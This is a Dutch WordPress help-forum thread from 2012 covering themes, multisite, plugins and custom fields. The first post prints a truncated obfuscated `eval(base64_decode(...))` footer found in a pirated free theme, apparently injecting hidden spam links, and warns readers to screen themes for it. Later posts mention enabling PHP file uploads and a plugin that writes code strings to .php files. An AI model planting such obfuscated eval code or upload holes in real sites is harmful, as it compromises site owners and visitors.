Het grote WordPress topic

Pagina: 1 ... 6 ... 9 Laatste
Acties:

Onderwerpen

Acties:
  • 0 Henk 'm!

• Alfa Novanta
  • Registratie: Oktober 2001
  • Laatst online: 14-09 00:17

Alfa Novanta

VRRROOOAAARRRP

ing._Buttje schreef op donderdag 08 maart 2012 @ 00:07:
Nou, toch nog anders gedaan. Eerst de theme maar eens beter onder de loep genomen. Om dat goed te kunnen doen heb ik de theme nogmaals op internet gezocht en van 3 of 4 verschillende bronnen gedownload. De Readme.txt was overal hetzelfde qua versie enzo, maar de inhoud verder verschilde wel eens een bestandje of 1 of 2 .. O-)

voorbeeld, mijn versie had extra:
  • theme_licence.php
  • license.txt
  • start_template.php
De inhoud van de license was allemaal abracadabra, maar als het om een license gaat, vind ik dat niet direct vreemd, maargoed, ik vond nu een versie zonder license geneuzel en die doet het ook :P

Ook de grootte verschilde soms, want allemaal hadden ze
  • footer.php
Zoals hij standaard was:
code:
1
2
3
4
5
6
7
8
9
10
</div></div>
<div id="footer">
<a href="http://www.alertswift.com/">Web Monitoring Service</a>
        &copy; <?php echo date("Y");?> - <?php bloginfo('name'); ?>.<br/>
        <!-- Start -->Wordpress themes<!-- End --> 
        <?php wp_footer(); ?>
</div>
</div>
</body>
</html>

hoe een andere was ..

code:
1
2
3
4
5
6
7
<?php eval(base64_decode('Pz4gPC9kaXY+PC9kaXY+DQo8ZGl2IGlkPSJmb290ZXIiPg0KCQkm
Y29weTsgPD9waHAgZWNobyBkYXRlKCJZIik7Pz4gLSA8P3BocCBibG9naW5mbygnbmFtZScp
...
<knipperdeknip>
...
OyA/Pi48YnIvPg0KCQk8P3BocCBpZihpc19mcm9udF9wYWl2Pg0KPC9ib2R5Pg0KPC9odG1
sPg0KIDw/'));?>

:')

en mijn huidige versie
code:
1
2
3
4
5
6
7
8
</div></div>
<div id="footer">
        &copy; <?php echo date("Y");?><br/>
        <?php wp_footer(); ?>
</div>
</div>
</body>
</html>

;)

Database weer gestript van de colon-spam en teruggezet. Nu maar weer afwachten ..
Sinds mijn acties is de 'colon cleansing' hidden-link niet meer teruggekomen *O*

Verwijderd schreef op woensdag 14 maart 2012 @ 23:35:
wat zijn nu goede sites voor themes.

als je met free in je search googled dan krijg je echt een shitload aan hits en er zit echt veel bagger tussen.
.. dus je zou kunnen concluderen dat je iedere theme op zijn minst een kans zou kunnen geven door hem te downloaden en te screenen op encrypted code, met name header en footer. Kom je allemaal Jibberish tegen, dan issie niet te vertrouwen!

[ Voor 103% gewijzigd door Alfa Novanta op 15-03-2012 10:39 . Reden: grr .. page break :X ]

My Youtube channel: Alfa Novanta
AMD Ryzen 7 5800X | ASRock X470 Taichi | 32GB Kingston HyperX Predator DDR4-3200 RGB | Gigabyte RTX3090 Gaming OC 24GB GDDR6 | Windows 10 x64 | HP Reverb G2

Acties:
  • 0 Henk 'm!

Verwijderd

weet iemand trouwens een plugin die dit kan:

een google maps map op je site.
daarin de locaties van waar je bent en bent geweest.
dat als je mobiel blogt dat op de kaart ook de locatie van de post is te zien.
een app voor android die nieuwe locaties naar de map kan doorgeven.

Acties:
  • 0 Henk 'm!

Verwijderd

Mensen, even een "hoe zouden jullie dit doen"- vraagje: heb meerdere WP'jes
die ik nu op een VPS wil gooien, mijn eigen main WP draait al helemaal, snel
en naar behoren, nu wil ik er alleen wat naast draaien, 1 of 2 WP'jes van wat
maatjes.

Hoe kun je dit nou het beste doen, zodat het losstaat van elkaar? Heb al een
separate DB gemaakt (dus DB1 voor mij, DB2 voor iemand anders en nog een
andere DB3) en ook verschillende users. Alleen hoe kun je nou het wederom nou
het beste een separate WP maken?

Weet wel hoe ik een network-WP kan maken, maar dan werk je vanuit 1 DB en
dat wil ik écht niet. Of is dit verkeerd dat ik dit denk? Iemand een suggestie?

Acties:
  • 0 Henk 'm!

Verwijderd

vraagje.
ik heb mijn primaire WP pagina in het nederlands.
kan ik knoppen installeren dat die schakelt tussen talen?
wil duits en engels toevoegen. (uiteraard snap ik dat ik de inhoud/teksten zelf moet vertalen maar dat is geen probleem.

Acties:
  • 0 Henk 'm!

• DoDo
  • Registratie: Juli 2001
  • Laatst online: 19:01
Verwijderd schreef op donderdag 15 maart 2012 @ 13:41:
Mensen, even een "hoe zouden jullie dit doen"- vraagje: heb meerdere WP'jes
die ik nu op een VPS wil gooien, mijn eigen main WP draait al helemaal, snel
en naar behoren, nu wil ik er alleen wat naast draaien, 1 of 2 WP'jes van wat
maatjes.

Hoe kun je dit nou het beste doen, zodat het losstaat van elkaar? Heb al een
separate DB gemaakt (dus DB1 voor mij, DB2 voor iemand anders en nog een
andere DB3) en ook verschillende users. Alleen hoe kun je nou het wederom nou
het beste een separate WP maken?

Weet wel hoe ik een network-WP kan maken, maar dan werk je vanuit 1 DB en
dat wil ik écht niet. Of is dit verkeerd dat ik dit denk? Iemand een suggestie?
Als je losse databases hebt dan zijn het toch losse WP installaties? Hier draaien we gewoon voor elke WP een volledig nieuwe installatie.

Acties:
  • 0 Henk 'm!

Verwijderd

Maar, plaats je de data in een subdirectory of in de 'root'?
Heb namelijk mijn eigen wordpress reeds in de root als 'WORDPRESS' staan.

Acties:
  • 0 Henk 'm!

• TheNephilim
  • Registratie: September 2005
  • Laatst online: 12-09 14:37

TheNephilim

Wtfuzzle

Verwijderd schreef op vrijdag 16 maart 2012 @ 10:00:
Maar, plaats je de data in een subdirectory of in de 'root'?
Heb namelijk mijn eigen wordpress reeds in de root als 'WORDPRESS' staan.
Ik heb hier lokaal een netwerk draaien om dingen te testen, de bedoeling is dat we op die manier hosting gaan aanbieden in de cloud.

Data zit gewoon achter wp-content net als normaal. Dus je hebt 1 WP installatie, er komen echter wat tabellen bij in de database. De normale prefix is wp_ en dat word dan wp_1_ en wp_2_ ... dus getal omhoog voor elke site die je in je netwerk draait.
Ook komen er in wp-content extra files en een extra directory te staan.

Er is een plugin te krijgen die de sites elk een aparte database geeft. Volgens mij was het deze: http://premium.wpmudev.org/project/multi-db

Acties:
  • 0 Henk 'm!

Verwijderd

Duidelijk dat heb ik even nodig. Heb je ook suggesties tot gratis plugins of?

EDIT: deze bijvoorbeeld? http://wordpress.org/extend/plugins/hyperdb/

EDIT2: snap er geen bal van :+

Je hebt dus:

1. network installation op WP waarbij je separate DB's kunt maken in MySQL of samengevoegd, je een WP site ONDER je huidige WP gooit?

2. separate WP die een separate SQL en wp-admin heeft zeg maar? (of zie ik dat verkeerd?

Wil eigenlijk echt ALLES los van elkaar hebben. Heb gewoon een VPS, draait Apache, PHP
en MySQL op, hoofdWP is die van mij, maar daar wil ik er gewoon een stuk of 2 naast hebben.
Dus bij wijze van: WP1 WP2 WP3 (en niet dat geneuzel met subdomains etc etc)

[ Voor 96% gewijzigd door Verwijderd op 16-03-2012 16:41 ]

Acties:
  • 0 Henk 'm!

Verwijderd

Weet iemand toevallig hoe ik in contact kan komen met een wordpress pagina waar geen contact gegevens op staan?

Acties:
  • 0 Henk 'm!

• Coach4All
  • Registratie: Januari 2003
  • Laatst online: 12-09 10:26

Coach4All

I'm a Coach 4 All

Verwijderd schreef op zondag 18 maart 2012 @ 11:08:
Weet iemand toevallig hoe ik in contact kan komen met een wordpress pagina waar geen contact gegevens op staan?
Aanklikken :? ?
Of bedoel je met de persoon erachter? Dan zal het iets moeten zijn van een search op whois of sidn.nl.

--- Systeembeheerdersdag --- Voedselintolerantie ---

Acties:
  • 0 Henk 'm!

• TheNephilim

TheNephilim

Wtfuzzle

Verwijderd schreef op vrijdag 16 maart 2012 @ 13:23:
Duidelijk dat heb ik even nodig. Heb je ook suggesties tot gratis plugins of?

EDIT: deze bijvoorbeeld? http://wordpress.org/extend/plugins/hyperdb/

EDIT2: snap er geen bal van :+

Je hebt dus:

1. network installation op WP waarbij je separate DB's kunt maken in MySQL of samengevoegd, je een WP site ONDER je huidige WP gooit?

2. separate WP die een separate SQL en wp-admin heeft zeg maar? (of zie ik dat verkeerd?

Wil eigenlijk echt ALLES los van elkaar hebben. Heb gewoon een VPS, draait Apache, PHP
en MySQL op, hoofdWP is die van mij, maar daar wil ik er gewoon een stuk of 2 naast hebben.
Dus bij wijze van: WP1 WP2 WP3 (en niet dat geneuzel met subdomains etc etc)
Ben niet op de hoogte van gratis plugins op het moment, ik weet alleen dat die ene bestaat en die is vrij duur inderdaad :o

Je hebt een gewone installatie: www/wp en dan evt (www/wp2 & www/wp3). Dan krijg je wel subdomeinen, maar heb je volledig aparte datadir en evt database. Je kunt er een andere database voor aanmaken in ieder geval.

Als je een netwerk installatie doet: www/wp, dan kun je met een plugin meerdere domeinen op die ene installatie hebben. Je hebt dan een network met meerdere sites, die sites kunnen dan hun eigen domeinnaam hebben. Standaard is het alleen subdomein of een subdir.
Met een netwerkinstallatie kun je standaard niet opgeven dat elke site in een andere database moet. Je hebt dus 1 database en als je prefix wp_ is (standaard) dan maakt wp er wp_<site-id>_ van.

Je kunt voor elke site rechten en opties instellen. Zelfs een disk-quota, dus erg handig. Het voordeel is dat je bij een WP update (3.3.2 bijv.) niet alle installaties apart moet updaten. Je kunt gewoon het netwerk updaten en alles is geregeld.

Ik zou gewoon eens een test omgeving opzetten met een WP network, dan kun je zien wat het doet en of het aan je eisen voldoet.

http://codex.wordpress.org/Create_A_Network

Acties:
  • 0 Henk 'm!

Verwijderd

Als je de database naam ook in je wp-config zet bij costum user table kun je wel meerdere afzondelijke WP installaties laten draaien op 1 user database.

Zo heb ik ook 4 afzondelijke wordpress sites draaien met 1 user database en allen afzonderlijk een content database.

Acties:
  • 0 Henk 'm!

Verwijderd

ik heb google analytics verbonden aan mijn wordpress website.
Nu telt die ook mijn eigen visits mee en dat wil ik niet.
Ik kan wel in analytics een filter instellen op ip adres of domein maar ik gebruik veel verschillende verbindingen.
moet ik dan iedere keer het ip adres aan de filter toevoegen of is er iets als een Mac-adres filter?

Acties:
  • 0 Henk 'm!

• MsG
  • Registratie: November 2007
  • Laatst online: 22:26

MsG

Forumzwerver

De website krijgt dingen als een mac-adres helemaal niet door gelukkig. Als je aldoor andere verbindingen gebruikt is het voor Wordpress natuurlijk niet te zien wanneer jij het bent en wanneer niet. Blokkeren is voor zover ik weet de enige optie.

Denk om uw spatiegebruik. Dit scheelt Tweakers.net kostbare databaseruimte! | Groninger en geïnteresseerd in Domotica? Kom naar DomoticaGrunn

Acties:
  • 0 Henk 'm!

Verwijderd

Verwijderd schreef op dinsdag 20 maart 2012 @ 12:35:
Als je de database naam ook in je wp-config zet bij costum user table kun je wel meerdere afzondelijke WP installaties laten draaien op 1 user database.

Zo heb ik ook 4 afzondelijke wordpress sites draaien met 1 user database en allen afzonderlijk een content database.
Ja, dat wil ik dus niet, STEL ik krijg mot met iemand, of iemand heeft zoiets
van: ik wil het zelf ergens laten draaien, wil ik eigenlijk zó de DB en content
weg kunnen halen.

Acties:
  • 0 Henk 'm!

• TheNephilim

TheNephilim

Wtfuzzle

Verwijderd schreef op dinsdag 20 maart 2012 @ 13:49:
[...]

Ja, dat wil ik dus niet, STEL ik krijg mot met iemand, of iemand heeft zoiets
van: ik wil het zelf ergens laten draaien, wil ik eigenlijk zó de DB en content
weg kunnen halen.
Nou dan gebruik je toch gewoon de export functie in Wordpress zelf? Theme even downloaden via FTP en klaar... komt geen database toegang aan te pas.
Verwijderd schreef op dinsdag 20 maart 2012 @ 12:41:
Ik kan wel in analytics een filter instellen op ip adres of domein maar ik gebruik veel verschillende verbindingen.
moet ik dan iedere keer het ip adres aan de filter toevoegen of is er iets als een Mac-adres filter?
Als je gewoon de code onderin je footer.php gezet hebt kun je gewoon checken op is_user_logged_in(). Dan include je de Google Analytics code alleen als je niet ingelogd bent. Dat is natuurlijk alleen handig als andere bezoekers geen gebruik maken van een login op je website.

[ Voor 45% gewijzigd door TheNephilim op 21-03-2012 14:07 ]

Acties:
  • 0 Henk 'm!

• MueR
  • Registratie: Januari 2004
  • Laatst online: 00:31

MueR

Admin Tweakers Discord

is niet lief

Wat vertelt Google je?

Anyone who gets in between me and my morning coffee should be insecure.

Acties:
  • 0 Henk 'm!

• xtra
  • Registratie: November 2001
  • Laatst online: 28-08 18:14
Er zijn meerdere Analytics plugins die de code weglaten zodra je bent ingelogd (als beheerder.)

Acties:
  • 0 Henk 'm!

• Nedra
  • Registratie: Juli 2006
  • Laatst online: 17-10-2023
heeft iemand wel eens last gehad van 'spam' downloaders? Ik zie bij een site met de plugin ' simple download manager' dat bepaalde bestanden heel vaak ' gedownload' worden door hetzelfde ip adres. Op deze manier klopt de count niet meer, en die hebben we juist nodig. Enig idee wat dit veroorzaakt?

Acties:
  • 0 Henk 'm!

• TheNephilim

TheNephilim

Wtfuzzle

Nedra schreef op woensdag 21 maart 2012 @ 15:58:
heeft iemand wel eens last gehad van 'spam' downloaders? Ik zie bij een site met de plugin ' simple download manager' dat bepaalde bestanden heel vaak ' gedownload' worden door hetzelfde ip adres. Op deze manier klopt de count niet meer, en die hebben we juist nodig. Enig idee wat dit veroorzaakt?
Heb je al eens gekeken van wie dat IP adres is?

Sowieso zullen bots ook je content downloaden in sommige gevallen.

Acties:
  • 0 Henk 'm!

Verwijderd

Heb daar zelf Cloudflare voor draaien, best content over :+.
Goed wapen tegen bots and crawlers.

Acties:
  • 0 Henk 'm!

• Vincitore
  • Registratie: September 2006
  • Laatst online: 05-08-2021
Ik heb al heel wat uren afgezocht naar de juiste plugin voor mijn probleem, maar kan het niet vinden helaas :(
Wat ik zou willen kunnen op mijn WP site is het volgende,

Een zoekfunctie waarbij je een tekstveld hebt voor plaats en een dropdown veld met gegevens zoals;
  • Zoeken op plaatsnaam of bedrijfsnaam (tekstveld)
  • Selectie maken op provincie (dropdown)
  • Selectie maken op behandelingen (dropdown)
Graag zie ik al mijn gegevens in een tabel verwerkt, waarbij men kan klikken op de naam van het bedrijf om door te gaan naar hun eigen detailpagina. Tot dusver heb ik wel een tabel plugin gevonden, maar hierbij kon ik geen links aanmaken.

Bestaat er zoiets überhaupt of vraag ik nu teveel van het goede?

Stats

Acties:
  • 0 Henk 'm!

• TheNephilim

TheNephilim

Wtfuzzle

Vincitore schreef op zondag 25 maart 2012 @ 11:44:
Ik heb al heel wat uren afgezocht naar de juiste plugin voor mijn probleem, maar kan het niet vinden helaas :(
Wat ik zou willen kunnen op mijn WP site is het volgende,

Een zoekfunctie waarbij je een tekstveld hebt voor plaats en een dropdown veld met gegevens zoals;
  • Zoeken op plaatsnaam of bedrijfsnaam (tekstveld)
  • Selectie maken op provincie (dropdown)
  • Selectie maken op behandelingen (dropdown)
Graag zie ik al mijn gegevens in een tabel verwerkt, waarbij men kan klikken op de naam van het bedrijf om door te gaan naar hun eigen detailpagina. Tot dusver heb ik wel een tabel plugin gevonden, maar hierbij kon ik geen links aanmaken.

Bestaat er zoiets überhaupt of vraag ik nu teveel van het goede?
Dit zul je toch echt zelf moeten gaan scripten! Een duwtje in de goede richting:

- http://codex.wordpress.org/Post_Types
- http://codex.wordpress.org/Function_Reference/add_meta_box of http://wordpress.org/extend/plugins/meta-box/
- http://codex.wordpress.or...ent#Custom_Page_Templates

Je zult custom post types moeten gebruiken om de entiteiten toe te voegen in je Wordpress Theme. Op die entiteiten voeg je extra velden toe (custom meta box) en dan zul je een template moeten maken in je theme waarin je het zoeken en dergelijke verwerkt.

Al met al niet heel makkelijk als je met bovenstaande niet bekend bent, ook moet ik zeggen dat je eisen bijna een eigen PHP applicatie vereisen in plaats van gebruik maken van Wordpress.

Acties:
  • 0 Henk 'm!

• Vincitore
Bedankt voor de snelle reactie!

Helaas ben ik zelf niet zo bekend met scripten, dus dat is even een tegenvaller. We gaan gewoon op zoek naar iemand die de zoekfunctie dan kan inbouwen.

/edit: Heb wel een eventuele plugin gevonden, custom tables, heet deze dus die ga ik uitproberen.
Zien of het werkt...

[ Voor 34% gewijzigd door Vincitore op 26-03-2012 20:37 ]

Stats

Acties:
  • 0 Henk 'm!

Verwijderd

Een vraag in het algemeen: als je aan een WP post of page extra variabelen wilt toevoegen, zoals 'adres', 'website', 'e-mail' en 'openingstijden', moet je dat dan altijd doen m.b.v. een custom meta box?

Ik ben al eens bezig geweest met custom post types en daaraan custom meta boxen gekoppeld, maar vroeg me af of dit de enige juiste manier is of dat het ook nog anders kan.

Acties:
  • 0 Henk 'm!

• TheNephilim

TheNephilim

Wtfuzzle

Verwijderd schreef op maandag 26 maart 2012 @ 22:36:
Een vraag in het algemeen: als je aan een WP post of page extra variabelen wilt toevoegen, zoals 'adres', 'website', 'e-mail' en 'openingstijden', moet je dat dan altijd doen m.b.v. een custom meta box?

Ik ben al eens bezig geweest met custom post types en daaraan custom meta boxen gekoppeld, maar vroeg me af of dit de enige juiste manier is of dat het ook nog anders kan.
Er zijn vast meer manieren.... maar met Custom Meta Boxes is de enige juiste manier. Ik moet zeggen dat het soms wat omslachtig lijkt, je moet nog veel regelen om een meta box toe te voegen. Dat is ook nodig om eigen implementaties toe te kunnen voegen, maar het kan onoverzichtelijk worden.
Als je gewoon netjes code, valt het over het algemeen wel mee en werken de custom meta boxes goed.

Acties:
  • 0 Henk 'm!

• Vos
  • Registratie: Juni 2000
  • Laatst online: 22:32

Vos

AFCA

Verwijderd schreef op maandag 26 maart 2012 @ 22:36:

Bekend met deze plugin? http://www.advancedcustomfields.com/

Acties:
  • 0 Henk 'm!

• TheNephilim

TheNephilim

Wtfuzzle

Hmmm, ik heb al enkele plugins de revue zien passeren, maar deze ziet er wel erg strak uit! :o

Acties:
  • 0 Henk 'm!

Verwijderd

Nu wel. :) Dank je voor de tip, het ziet er goed uit!

@ Nephilim: Ook weer bedankt voor de uitleg. Ik dacht net dat ik eruit was (door jouw duwtje in de goede richting) met het zelf maken van custom post types en custom meta boxes daaraan gekoppeld, komt Vos met deze plugin. :) Nu ga ik weer twijfelen wat ik ga gebruiken, ik denk de plugin... :)

Acties:
  • 0 Henk 'm!

Verwijderd

Wow cool, die plugin ga ik ook proberen :)

Acties:
  • 0 Henk 'm!

• Nedra
Advanced custom fields is inderdaad een fijne plugin. Mocht je meer zin hebben om zelf dingen te scripten bied developers custom fields een mooie aantal scopes en hooks om je custom fields mee te configureren.

Nog even over de download counter waar ik het een paar posts eerder over had. Ik zit dus met een site waar een hoop PDF bestanden als download worden aangeboden. Voor de beheerders van de site is het belangrijk een download count te hebben, waarvoor er een plugin is geinstalleerd (Simple download manager).

Het probleem is nou dat er tientallen, zo niet honderd tallen verschillende IP adressen zijn met honderden entries in het download log, zonder dat er ook daadwerkelijk iets gedownload is. Dit lijkt me gedeeltelijk het werk van crawlers, maar alles? Het probleem is dus dat ik niet precies begrijp waar al deze entries vandaan komen, en dus ook niet helemaal een idee heb hoe ik me hier tegen kan wapenen. Misschien is het een idee om in ieder geval de download map voor crawlers te blokkeren via een robots.text en een captcha voor de download sites op de link te plaatsen? Mochten jullie nog ideeën hebben, dan hoor ik dat graag!

Acties:
  • 0 Henk 'm!

Verwijderd

Voor een CV projectje wil ik een Wordpress site maken waarop 2 groepen mensen kunnen inloggen. Werkzoekenden en werkgevers. Werkzoekenden mogen zelf 1 pagina maken en kunnen verder niets zien van andere users. Werkgevers mogen wel alle gegevens van de werkzoekenden zien.

Nou is mijn vraag: hoe hou ik die 2 groepen uit elkaar? Het lijkt me dat bij registereren ergens een veld moet staan waarbij kan worden geselecteerd of de gebruiker een werkgever is of werkzoeker, maar hoe krijg ik dat gedaan in het systeem? Of moet ik gewoon iedereen die zelf kan registreren behandelen als werkzoeker en de werkgevers ergens zelf met de hand aanmaken en rechten geven?

Acties:
  • 0 Henk 'm!

• Scott
  • Registratie: December 2004
  • Laatst online: 19:56

Scott

Ik ben, dus ik tweak

Ik ben op zoek naar een plugin waarmee ik zonder FTP bestanden kan uploaden. Het gaat om PHP-bestanden (voor andere plugins), dus de media upload (waarvoor 1001 plugins te vinden zijn) is niet echt een optie, de bestanden moeten geupload worden naar een door de user te bepalen map ergens in de wordpress-map. Is zoiets überhaupt beschikbaar, of moet ik toch echt nog eens aandringen de FTP-gegevens te achterhalen?

Acties:
  • 0 Henk 'm!

• TheNephilim

TheNephilim

Wtfuzzle

Verwijderd schreef op vrijdag 06 april 2012 @ 19:25:
Voor een CV projectje wil ik een Wordpress site maken waarop 2 groepen mensen kunnen inloggen. Werkzoekenden en werkgevers. Werkzoekenden mogen zelf 1 pagina maken en kunnen verder niets zien van andere users. Werkgevers mogen wel alle gegevens van de werkzoekenden zien.

Nou is mijn vraag: hoe hou ik die 2 groepen uit elkaar? Het lijkt me dat bij registereren ergens een veld moet staan waarbij kan worden geselecteerd of de gebruiker een werkgever is of werkzoeker, maar hoe krijg ik dat gedaan in het systeem? Of moet ik gewoon iedereen die zelf kan registreren behandelen als werkzoeker en de werkgevers ergens zelf met de hand aanmaken en rechten geven?
http://codex.wordpress.org/Function_Reference/add_role
Scott schreef op maandag 09 april 2012 @ 19:06:
Ik ben op zoek naar een plugin waarmee ik zonder FTP bestanden kan uploaden. Het gaat om PHP-bestanden (voor andere plugins), dus de media upload (waarvoor 1001 plugins te vinden zijn) is niet echt een optie, de bestanden moeten geupload worden naar een door de user te bepalen map ergens in de wordpress-map. Is zoiets überhaupt beschikbaar, of moet ik toch echt nog eens aandringen de FTP-gegevens te achterhalen?
PHP bestanden uploaden is niet verstandig, maar mocht je het echt willen: http://howto.blbosti.com/...st-of-allowed-file-types/

Acties:
  • 0 Henk 'm!

• Scott
  • Registratie: December 2004
  • Laatst online: 19:56

Scott

Ik ben, dus ik tweak

Ik begrijp dat het niet verstandig is, maar het was m'n enige optie. Heb het uiteindelijk maar gedaan door een plugin te schrijven die een bepaalde string (PHP-code) naar een .php-bestand schreef. Niet echt veilig, maarja...

Acties:
  • 0 Henk 'm!

• Bombtrack
  • Registratie: November 2009
  • Laatst online: 17-08 23:50

Bombtrack

<GoT>Bombtrack#2553

Ik heb een tijd geleden de overstap gemaakt van blogger naar wordpress. Wow wat was dat een stap voorwaarts! Wordpress is vele malen flexibeler en de plugins maken het helemaal af.

Ik ben toen begonnen met een gratis thema en dat beviel, maar ik merk nu de site wat groter word en meertalig is gemaakt dat het gratis thema zijn limieten heeft, waaronder een fikse bug in de nederlandse homepage.
Daarom ben ik nu op zoek naar een vervangend thema, gratis of premium, maar ik kan niet echts iets vinden.

Ik zoek een thema wat de hoofdlijnen van mijn website intact houdt en compatible is met polylang, de plugin die zorgt dat mijn site meertalig is.

Alle hulp is welkom!

Zo ziet mijn site er nu uit: http://technopsisblog.com/
Hier de nederlandse post over mijn theme met de eisen die ik onder andere stel aan een theme: http://technopsisblog.com/nieuw-wordpress-thema/

Zoals ik al zei, alle hulp is welkom - mijn site loopt langzaam vast met dit oude thema en ik wil het zo snel mogelijk vervangen voor iets nieuws!

Casual Critic op YouTube

Acties:
  • 0 Henk 'm!

Verwijderd

Thanks! En dan voor de werkzoekenden een custom post type maken met meta boxes?

Voor de werkgevers hoef ik dan niets meer te doen denk ik? Althans, zij moeten wel op een pagina kunnen komen om te zoeken door de CV's van de werkzoekenden, daar moet ik dan ook nog even wat op vinden.

Acties:
  • 0 Henk 'm!

• Martijn19
  • Registratie: Februari 2012
  • Laatst online: 28-07 12:47
Bombtrack schreef op donderdag 12 april 2012 @ 21:35:
Ik heb een tijd geleden de overstap gemaakt van blogger naar wordpress. Wow wat was dat een stap voorwaarts! Wordpress is vele malen flexibeler en de plugins maken het helemaal af.

Ik ben toen begonnen met een gratis thema en dat beviel, maar ik merk nu de site wat groter word en meertalig is gemaakt dat het gratis thema zijn limieten heeft, waaronder een fikse bug in de nederlandse homepage.
Daarom ben ik nu op zoek naar een vervangend thema, gratis of premium, maar ik kan niet echts iets vinden.

Ik zoek een thema wat de hoofdlijnen van mijn website intact houdt en compatible is met polylang, de plugin die zorgt dat mijn site meertalig is.

Alle hulp is welkom!

Zo ziet mijn site er nu uit: http://technopsisblog.com/
Hier de nederlandse post over mijn theme met de eisen die ik onder andere stel aan een theme: http://technopsisblog.com/nieuw-wordpress-thema/

Zoals ik al zei, alle hulp is welkom - mijn site loopt langzaam vast met dit oude thema en ik wil het zo snel mogelijk vervangen voor iets nieuws!
Heb je www.themeforest.net al geprobeerd? De standaard is der imo best hoog. Je hebt een aparte categorie voor wordpress theme's ;)

Acties:
  • 0 Henk 'm!

• Bombtrack
  • Registratie: November 2009
  • Laatst online: 17-08 23:50

Bombtrack

<GoT>Bombtrack#2553

Jazeker - ik kreeg de link toevallig gisteren door en zag daar het Volt thema. Tot nu toe is dit de grootste kanshebber wat mij betreft. Iemand nog op of aanmerking op het volt theme?
http://themeforest.net/it...WT.z_author=SaurabhSharma

Casual Critic op YouTube

Acties:
  • 0 Henk 'm!

• Vincitore
Graag wil ik feedback over mijn site http://www.jouwafspraak.nl

De site is momenteel nog in ontwikkeling, dus het een en ander is nog te verbeteren/wordt aan gewerkt.

Waar ik momenteel mee zit is het volgende:

- Een goede (NL) plugin voor inloggen op de homepage (mag op plaats van huidige login of header bijv.)
- Nu heb ik gehyperlinkt naar mijn wp-login.php, alleen dan kom je in de dashboard van Wordpress. Nu kan dat uitgeschakeld worden zie ik door plugin "Hide Dashboard".

- Dubbele tekst bij http://www.jouwafspraak.nl/diensten/ (2e van boven in de tabel)
- Krijg het niet voor elkaar, lijkt een fout te zitten maar weet niet waar de oorzaak te vidnen is.

- Hoe kan ik mensen direct laten betalen via iDeal (liefst Sisow) bij http://www.jouwafspraak.nl/prijzen/ Zodat mensen klikken op bestel nu en dat ze dan in een 'winkelwagen' komen.
- Is daar een makkelijke plugin voor zodat ik niet een webshop hoef op te richten voor deze 3 pakketten?

Heb van alles geprobeerd, maar niets lijkt te werken voor mij.

Stats

Acties:
  • 0 Henk 'm!

• Vos

Vos

AFCA

Die 'dubbele tekst' zit hem in de 1e regel ;)...'Voordelen van uw eigen online agenda'. Deze past niet op 1 regel.

Acties:
  • 0 Henk 'm!

• Ruzor
  • Registratie: Februari 2003
  • Niet online

Ruzor

Off with his head man

Voor je eerste "probleem" is dit wel een goede:

http://wordpress.org/extend/plugins/sidebar-login/

Voor je derde zou ik even in de plugin directory zoeken van WordPress, staan er genoeg! :)

[This is what you get when you mess with us]

Acties:
  • 0 Henk 'm!

• Joopieboy
  • Registratie: Mei 2006
  • Laatst online: 29-12-2020

Joopieboy

No smoke, no poke

Ik zit op dit moment met wat ideeën met Wordpress en een andere indeling van een pagina met posts.

Wat ik graag zou willen zien is zoals op de hoofdpagina 1 nieuwe post, of de 2 nieuwste, maar die dan een aantal regels getoond worden, en je voor de rest door moet klikken.

Hier heb ik geen idee van hoe ik moet zoeken op dit idee.

Dan de post pagina zelf, eigenlijk wil ik een lijst met titels waarmee je kunt doorklikken naar een pagina waar de post volledig opstaat. Zou dit mogelijk kunnen zijn?

Of heeft iemand andere ideeën, tips/trucs, etc? :)

Het leven is te kort om geduld te hebben!

Acties:
  • 0 Henk 'm!

• Nedra
Joopieboy schreef op zaterdag 21 april 2012 @ 21:44:
Ik zit op dit moment met wat ideeën met Wordpress en een andere indeling van een pagina met posts.

Wat ik graag zou willen zien is zoals op de hoofdpagina 1 nieuwe post, of de 2 nieuwste, maar die dan een aantal regels getoond worden, en je voor de rest door moet klikken.

Hier heb ik geen idee van hoe ik moet zoeken op dit idee.

Dan de post pagina zelf, eigenlijk wil ik een lijst met titels waarmee je kunt doorklikken naar een pagina waar de post volledig opstaat. Zou dit mogelijk kunnen zijn?

Of heeft iemand andere ideeën, tips/trucs, etc? :)
Leesvoer!
http://codex.wordpress.org/Class_Reference/WP_Query
http://codex.wordpress.org/Function_Reference/the_excerpt
http://codex.wordpress.org/Template_Hierarchy

Acties:
  • 0 Henk 'm!

• Joopieboy

Joopieboy

No smoke, no poke

Ha! Dankjewel! :) Gaan we dat eens uitgebreid doornemen en bestuderen. :)

Acties:
  • 0 Henk 'm!

• Ankh
  • Registratie: Mei 2001
  • Laatst online: 22:18

Ankh

|true

Momenteel ben ik bezig met een eigen website, dit omdat we gaan backpacken en in een aantal landen geen facebook etc beschikbaar is :)

Voorheen had ik dit altijd met Joomla, maar ik heb nog nooit een lastigere frontend meegemaakt. Dus ben ik gaan zoeken naar een mooie oplossing. Daardoor ben ik terecht gekomen bij Wordpress, het is simpel precies wat ik zoek (zodat me vriendin ook zelf dingen kan doen).

Nu zoek ik eigenlijk nog steeds een goede, doch simpele thema. Momenteel gebruik ik hiervoor Oxygen. Enkel zijn ze overgestapt naar een betaalde variant. Maar de opzet, zoals het er uit ziet (zoals dit) is wel hetgeen wat ik zoek. En voordat ik een verkeerde thema download (met troep erin), hier iemand met een goed alternatief? Ik ben voor de rest goed kundig, dus kan ook veel zelf aanpassen. Zolang het maar niet raar in elkaar zit.. :)

-Ankh- Camera Gear: Nikon D7000 | Nikon AF-S DX 16-85mm f3.5-5.6 AF-S DX VR & Tokina AT-X 116 Pro DX AF 11-16mm f2,8

Acties:
  • 0 Henk 'm!

• Vos

Vos

AFCA

Heb zo niet echt een thema voor je, maar wel een site waar regelmatig goede thema's voorbij komen: http://wplift.com/category/wordpress-themes

Je kan ook handig je blog updaten via de WP app, mocht je bijvoorbeeld geen pc in de buurt hebben maar wel wifi oid.

[ Voor 29% gewijzigd door Vos op 23-04-2012 12:11 ]

Acties:
  • 0 Henk 'm!

• CH4OS
  • Registratie: April 2002
  • Niet online

CH4OS

It's a kind of magic

Ikzelf gebruik het Mystique thema (zoals vele anderen), dit is een erg veelzijdig en erg aanpasbare thema, wellicht kun je hier wat mee? :)
Laat de preview je niet in de war brengen, want er is veel meer mogelijk dan wat je ziet!

[ Voor 23% gewijzigd door CH4OS op 23-04-2012 12:15 ]

Acties:
  • 0 Henk 'm!

• sk1nny666
  • Registratie: Juli 2008
  • Laatst online: 05-09 09:28
ik zit hier een beetje me een probleem.

